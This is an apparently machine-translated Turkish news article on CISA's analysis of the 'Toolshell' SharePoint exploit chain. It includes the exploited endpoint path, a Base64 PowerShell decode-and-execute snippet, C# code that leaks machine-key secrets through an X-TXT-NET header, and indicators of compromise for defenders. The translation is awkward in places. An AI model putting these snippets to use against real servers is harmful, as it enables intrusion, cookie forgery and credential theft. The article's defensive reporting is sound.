ABD Siber Güvenlik ve Altyapı Güvenlik Ajansı (CISA), Temmuz 2025’in başlarında, Microsoft SharePoint sunucularını şirket içi hedefleyen sofistike bir istismar zinciri detaylandıran acil bir analiz yayınladı.
“Toolshell” olarak adlandırılan kampanya, iki yeni güvenlik açığından yararlanıyor-CVE-2025-49706, bir ağ sahtekarlığı kusuru ve bir uzaktan kod yürütme zayıflığı olan CVE-2025-49704-yetkisiz erişim elde etmek ve gizli webshells kurmak.
İlk uzlaşma, SharePoint’in düzenleme arayüzüne hazırlanmış bir istekle başlar ve çağırır /_layouts/15/ToolPane.aspx?DisplayMode=Editkimlik doğrulamayı atlar ve kötü niyetli bir ASPX yükü yükler.
CISA analistleri, saldırgan kabuk erişimi kazandıktan sonra, ASP.NET konfigürasyonundan kriptografik sırları hasat etmek için Base64 olarak kodlanan bir DLL tabanlı makine anahtar çıkarıcının zincirlendiğini belirtti.
Çıkarılan tuşlar X-TXT-NET Her yanıtı, korumalı ViewState ve çerez değerlerinin uzaktan şifresini kolaylaştırır.
Tespit imzaları, benzersiz üstbilgi ve ilişkili DLL karmalarını içerir, bu da sondaki enfeksiyonların hızlı bir şekilde tanımlanmasını sağlar.
CISA araştırmacılarına göre, son aşama, etkileşimli komut yürütme, dosya yüklemeleri ve kimlik bilgisi hasatını bir meydan okuma-yanıt giriş formu aracılığıyla destekleyen çok fonksiyonlu bir webshell (info3.aspx) dağıtır.
Saldırganlar PowerShell komutlarını Base64 kodlu dizeler aracılığıyla gönderir:-
$encoded = "JABiAGEAcwBlADYANABTAHQ..."
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded)) | iexBu snippet, yükü kodunu çözer ve bellekte yürütür ve minimum adli ayak izleri bırakır. Sonuç, disk yazılarından kaçınarak basit AV tespitinden kaçan kalıcı bir dayanaktır.
Toolshell’in enfeksiyon mekanizması, SharePoint’in özelleştirme özelliklerini kötüye kullanmaya çalışıyor.
Saldırgan bir yayın isteği gönderir spinstall0.aspxsunucunun yazmasına neden olur info3.aspx içine TEMPLATE\LAYOUTS dizin. Bir kez konuşlandırıldığında, info3.aspx Makine Anahtar Parametrelerini Almak İçin Başka Bir Base64 DLL (BJCLOIYQ.DLL) kodunu kodlar:-
var section = (MachineKeySection)WebConfigurationManager.GetSection("system. Web/machineKey");
var headerValue = $"{section.ValidationKey}|{section.DecryptionKey}";
Response.Headers.Add("X-TXT-NET", headerValue);Yansıma yoluyla çıkarılan bu kod, saldırganların daha sonra geçerli SharePoint çerezlerini dövmek ve kimlik doğrulamasını tamamen atlamak için kullandıkları sırları açıklar.
Kalıcılık, XOR tabanlı yük şifrelemesini uygulayan ve komut ve kontrol için yeniden kodlama yapan ek ASPX kabuklarının (spinstallb.aspx ve spinstallp.aspx) zincirlenmesi sağlanır.
Açıklanan IOC listesinin sürekli izlenmesi-ASPX dosya adları, DLL SHA-256 Hashes ve X-TXT-NET Başlık – savunucuların Toolshell’in gizli operasyonlarını tespit etmesi ve bozması için çok önemlidir.
SOC’nizi en son tehdit verilerine tam erişimle donatın Herhangi biri. Olay yanıtı iyileştirebilir -> 14 günlük ücretsiz deneme alın